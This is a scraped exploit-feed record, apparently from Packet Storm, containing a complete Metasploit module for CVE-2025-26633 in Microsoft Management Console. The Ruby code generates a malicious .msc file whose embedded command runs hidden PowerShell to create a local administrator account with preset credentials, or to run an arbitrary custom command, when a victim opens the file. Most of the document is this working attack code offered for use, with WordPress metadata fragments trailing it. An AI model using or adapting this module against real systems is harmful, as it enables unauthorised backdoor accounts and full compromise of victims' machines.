{“lastseen”:”2026-04-24T20:45:48″,”description”:”This Metasploit local Windows exploit module abuses the way Microsoft Management Console MMC processes specially crafted .msc files to achieve arbitrary PowerShell execution when a user opens the file. The payload is designed to create a new local…”,”published”:”2026-04-24T00:00:00″,”modified”:”2026-04-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Microsoft MMC (.MSC) File Execution Abuse Leading \/ Admin Creation”,”source”:””,”references”:””,”id”:”PACKETSTORM:219768″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-26633″],”sourceData”:”==================================================================================================================================\\n | # Title : Microsoft MMC (.MSC) File Execution Abuse Leading to Local Admin Creation Metasploit Module |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/www.microsoft.com |\\n ==================================================================================================================================\\n \\n [+] Summary : This Metasploit local Windows exploit module abuses the way Microsoft Management Console (MMC) processes specially crafted .msc files to achieve arbitrary PowerShell execution when a user opens the file.\\n The payload is designed to create a new local administrator account (or execute a custom command), but it only triggers when the victim manually opens the .msc file.\\n \\n [+] POC : \\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = ExcellentRanking\\n \\n include Msf::Post::Windows::Priv\\n include Msf::Post::File\\n include Msf::Exploit::FILEFORMAT\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Microsoft MMC MSC EvilTwin – Local Admin Creation (CVE-2025-26633)’,\\n ‘Description’ =\\u003e %q{\\n This module exploits a vulnerability in Microsoft Management Console (MMC)\\n that allows arbitrary code execution when a user opens a specially crafted\\n .msc file.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘indoushka’\\n ],\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e [ARCH_X64, ARCH_X86],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Windows (Local Admin Creation)’,\\n {\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e [ARCH_X64, ARCH_X86],\\n ‘Type’ =\\u003e :windows_admin\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0\\n )\\n )\\n \\n register_options([\\n OptString.new(‘FILENAME’, [true, ‘Output .msc filename’, ‘CVE-2025-26633-AddAdmin.msc’]),\\n OptString.new(‘USERNAME’, [true, ‘Local admin username to create’, ‘indoushka’]),\\n OptString.new(‘PASSWORD’, [true, ‘Local admin password’, ‘112233Az-*\/@!’]),\\n OptString.new(‘FULLNAME’, [false, ‘User full name’, ‘Lab User’]),\\n OptString.new(‘DESCRIPTION’, [false, ‘User description’, ‘Research account’]),\\n OptString.new(‘CUSTOM_COMMAND’, [false, ‘Custom command to execute instead of user creation’, nil])\\n ])\\n \\n register_advanced_options([\\n OptBool.new(‘SILENT’, [true, ‘Run PowerShell silently’, true]),\\n OptBool.new(‘VERBOSE_OUTPUT’, [true, ‘Show verbose PowerShell output’, false])\\n ])\\n end\\n \\n def exploit\\n print_status(\\”Creating malicious .msc file for CVE-2025-26633\\”)\\n \\n filename = datastore[‘FILENAME’]\\n username = datastore[‘USERNAME’]\\n password = datastore[‘PASSWORD’]\\n fullname = datastore[‘FULLNAME’]\\n description = datastore[‘DESCRIPTION’]\\n \\n powershell_cmd = build_powershell_payload(username, password, fullname, description)\\n msc_content = build_msc_file(powershell_cmd)\\n \\n file_path = File.join(Msf::Config.local_directory, filename)\\n File.binwrite(file_path, msc_content)\\n \\n print_good(\\”Malicious .msc file created: #{file_path}\\”)\\n \\n store_loot(\\n ‘mmc.malicious.msc’,\\n ‘application\/octet-stream’,\\n rhost,\\n msc_content,\\n filename,\\n ‘Malicious MSC file for CVE-2025-26633’\\n )\\n \\n print_status(\\”[*] Requires victim interaction to open MSC file\\”)\\n print_status(\\”[*] Example: mmc.exe \\\\\\”#{filename}\\\\\\”\\”)\\n print_status(\\”[+] Admin user: #{username}\\”)\\n end\\n \\n private\\n \\n def build_powershell_payload(username, password, fullname, description)\\n if datastore[‘CUSTOM_COMMAND’] \\u0026\\u0026 !datastore[‘CUSTOM_COMMAND’].empty?\\n return datastore[‘CUSTOM_COMMAND’]\\n end\\n \\n ps_script = \\u003c\\u003c~PS\\n $user = ‘#{username}’;\\n $pass = ConvertTo-SecureString ‘#{password}’ -AsPlainText -Force;\\n New-LocalUser -Name $user -Password $pass -FullName ‘#{fullname}’ -Description ‘#{description}’ -ErrorAction SilentlyContinue;\\n Add-LocalGroupMember -Group ‘Administrators’ -Member $user -ErrorAction SilentlyContinue;\\n PS\\n \\n ps_script = ps_script.strip.gsub(\/\\\\n\\\\s+\/, ‘; ‘)\\n \\n cmd = \\”powershell.exe -NoP\\”\\n \\n cmd += \\” -W Hidden\\” if datastore[‘SILENT’]\\n cmd += \\” -NoExit\\” if datastore[‘VERBOSE_OUTPUT’]\\n \\n cmd += \\” -C \\\\\\”#{ps_script}\\\\\\”\\”\\n \\n cmd\\n end\\n \\n def build_msc_file(command)\\n xml = \\u003c\\u003c~XML\\n \\u003c?xml version=\\”1.0\\” encoding=\\”utf-16\\”?\\u003e\\n \\u003cMMC_ConsoleFile ConsoleVersion=\\”3.0\\”\\u003e\\n \\u003cSnapIns\\u003e\\n \\u003cSnapIn\\u003e\\n \\u003cActions\\u003e\\n \\u003cAction\\u003e\\n \\u003cRunCommand\\u003e#{escape_xml(command)}\\u003c\/RunCommand\\u003e\\n \\u003c\/Action\\u003e\\n \\u003c\/Actions\\u003e\\n \\u003c\/SnapIn\\u003e\\n \\u003c\/SnapIns\\u003e\\n \\u003c\/MMC_ConsoleFile\\u003e\\n XML\\n \\n xml.strip.encode(‘utf-16le’)\\n end\\n \\n def escape_xml(text)\\n text.to_s\\n .gsub(‘\\u0026’, ‘\\u0026’)\\n .gsub(‘\\u003c’, ‘\\u003c’)\\n .gsub(‘\\u003e’, ‘\\u003e’)\\n .gsub(‘\\”‘, ‘\\”‘)\\n .gsub(\\”‘\\”, ”’)\\n end\\n end\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219768″,”cvss”:{“score”:7,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:L\/AC:H\/PR:N\/UI:R\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219768\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-24T20:45:48″,”description”:”This Metasploit local Windows exploit module abuses the way Microsoft Management Console MMC processes specially crafted .msc files to achieve arbitrary PowerShell execution when a…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,79,12,15,13,53,7,11,5],"class_list":["post-49292","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-70","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n